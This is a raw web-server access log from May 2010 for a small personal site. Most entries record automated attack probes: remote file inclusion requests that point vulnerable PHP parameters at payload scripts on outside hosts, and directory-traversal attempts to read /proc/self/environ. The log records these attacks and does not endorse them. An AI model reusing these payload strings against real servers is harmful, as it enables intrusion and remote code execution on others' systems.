66.249.71.36 - - [01/May/2010:10:51:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.36 - - [01/May/2010:10:51:18 -0500] "GET /logs/ HTTP/1.1" 200 3853 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
195.9.14.148 - - [01/May/2010:10:51:23 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:23 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:23 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:24 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:24 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:24 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:32 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:32 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:51:32 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
83.69.115.198 - - [01/May/2010:10:51:33 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
83.69.115.198 - - [01/May/2010:10:51:33 -0500] "GET /logs/access_log.1268611200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
83.69.115.198 - - [01/May/2010:10:51:34 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:52:16 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:52:16 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:52:16 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:52:49 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:52:49 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:10:52:49 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.13.50 - - [01/May/2010:10:52:55 -0500] "GET /logs/access_log.1230595200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.59.48.68 - - [01/May/2010:10:53:00 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.805"
66.59.48.68 - - [01/May/2010:10:53:00 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.805"
195.190.166.35 - - [01/May/2010:10:53:43 -0500] "GET //?path%5Bdocroot%5D=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
195.190.166.35 - - [01/May/2010:10:53:45 -0500] "GET /logs//?path%5Bdocroot%5D=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
195.190.166.35 - - [01/May/2010:10:53:45 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.62.142.217 - - [01/May/2010:10:55:28 -0500] "GET /logs/?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/gh1.txt?? HTTP/1.1" 200 3853 "-""Mozilla/5.0"
200.62.142.217 - - [01/May/2010:10:55:28 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/gh1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.62.142.217 - - [01/May/2010:10:55:28 -0500] "GET /?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/gh1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:56:12 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:56:12 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:56:13 -0500] "GET /logs/access_log.1227312000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:56:13 -0500] "GET /logs/access_log.1228262400//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:58:12 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:58:12 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:58:12 -0500] "GET /logs/access_log.1228262400//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:10:58:12 -0500] "GET /logs/access_log.1227312000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.249.71.36 - - [01/May/2010:11:12:19 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.245.85.109 - - [01/May/2010:11:12:59 -0500] "GET /logs/access_log.1211068800//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:11:12:59 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:11:13:00 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:11:13:07 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:11:13:07 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:11:13:07 -0500] "GET /logs/access_log.1264032000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:11:13:10 -0500] "GET /logs/access_log.1265760000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:11:14:50 -0500] "GET /logs/access_log.1168992000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.110.50.139 - - [01/May/2010:11:21:18 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:11:21:18 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:11:21:18 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:11:21:54 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [01/May/2010:11:22:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
195.9.14.148 - - [01/May/2010:11:22:57 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:22:57 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:22:57 -0500] "GET /logs/access_log.1251504000//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:11:23:40 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:11:23:40 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:11:23:40 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.217.216.132 - - [01/May/2010:11:24:15 -0500] "GET /logs/index.php?app=core&module=global§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
118.217.216.132 - - [01/May/2010:11:24:16 -0500] "GET /index.php?app=core&module=global§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
207.46.195.228 - - [01/May/2010:11:24:24 -0500] "GET /logs/access_log.1179100800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.49 - - [01/May/2010:11:24:25 -0500] "GET /logs/access_log.1264723200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.9.14.148 - - [01/May/2010:11:25:22 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:25:22 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:25:22 -0500] "GET /logs/access_log.1251504000//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:25:24 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:25:24 -0500] "GET /logs/access_log.1251504000//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:11:25:24 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
173.83.250.21 - - [01/May/2010:11:28:03 -0500] "GET /?option=com_letterman&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
173.83.250.21 - - [01/May/2010:11:28:09 -0500] "GET //index.php?option=com_letterman&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
211.19.31.123 - - [01/May/2010:11:30:11 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:11:30:11 -0500] "GET /logs/access_log.1264982400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:11:30:11 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:11:30:17 -0500] "GET /logs/access_log.1262995200//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
90.156.145.171 - - [01/May/2010:11:31:34 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
90.156.145.171 - - [01/May/2010:11:31:34 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
90.156.145.171 - - [01/May/2010:11:31:34 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
211.19.31.123 - - [01/May/2010:11:32:01 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:11:32:01 -0500] "GET /logs/access_log.1264982400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:11:32:01 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:11:32:11 -0500] "GET /logs/access_log.1262995200//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
92.240.42.10 - - [01/May/2010:11:33:01 -0500] "GET /logs//index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
92.240.42.10 - - [01/May/2010:11:33:02 -0500] "GET //index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.249.244.188 - - [01/May/2010:11:33:27 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/search?client=safari&rls=en&q=bert+grimm+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.249.244.188 - - [01/May/2010:11:33:27 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.249.244.188 - - [01/May/2010:11:33:27 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.249.244.188 - - [01/May/2010:11:33:27 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.249.244.188 - - [01/May/2010:11:33:27 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.249.244.188 - - [01/May/2010:11:33:28 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.249.244.188 - - [01/May/2010:11:33:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.218.116.134 - - [01/May/2010:11:34:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
90.156.145.171 - - [01/May/2010:11:35:07 -0500] "GET /logs/access_log.1270684800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
92.240.42.10 - - [01/May/2010:11:35:15 -0500] "GET //index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.218.116.131 - - [01/May/2010:11:35:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
92.240.42.10 - - [01/May/2010:11:37:46 -0500] "GET /logs//index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
92.240.42.10 - - [01/May/2010:11:37:46 -0500] "GET //index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
222.236.47.182 - - [01/May/2010:11:37:51 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:37:51 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:37:51 -0500] "GET /logs/access_log.1266278400//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:38:50 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:38:50 -0500] "GET /logs/access_log.1266278400//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:38:50 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:39:53 -0500] "GET /logs/access_log.1264032000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:39:53 -0500] "GET /logs/access_log.1265760000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:40:24 -0500] "GET /logs/access_log.1265760000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:11:40:24 -0500] "GET /logs/access_log.1264032000//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
207.46.195.223 - - [01/May/2010:11:41:54 -0500] "GET /logs/access_log.1187568000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.240.42.10 - - [01/May/2010:11:42:36 -0500] "GET /logs/access_log.1227484800//index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
92.240.42.10 - - [01/May/2010:11:42:36 -0500] "GET //index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.240.42.10 - - [01/May/2010:11:42:36 -0500] "GET /logs//index.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.218.116.166 - - [01/May/2010:11:43:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.36 - - [01/May/2010:11:44:13 -0500] "GET /logs/access_log.1235520000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.218.116.164 - - [01/May/2010:11:46:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [01/May/2010:11:46:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.42 - - [01/May/2010:11:46:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [01/May/2010:11:49:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [01/May/2010:11:50:44 -0500] "GET /logs/access_log.1205798400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:11:51:07 -0500] "GET /logs/access_log.1156291200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.43 - - [01/May/2010:11:51:24 -0500] "GET /logs/access_log.1165276800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.85 - - [01/May/2010:11:52:25 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/May/2010:11:52:49 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 200 3315 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.140.247.10 - - [01/May/2010:11:53:37 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.247.10 - - [01/May/2010:11:53:47 -0500] "GET /logs/access_log.1270684800%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 357 "-""Mozilla/5.0"
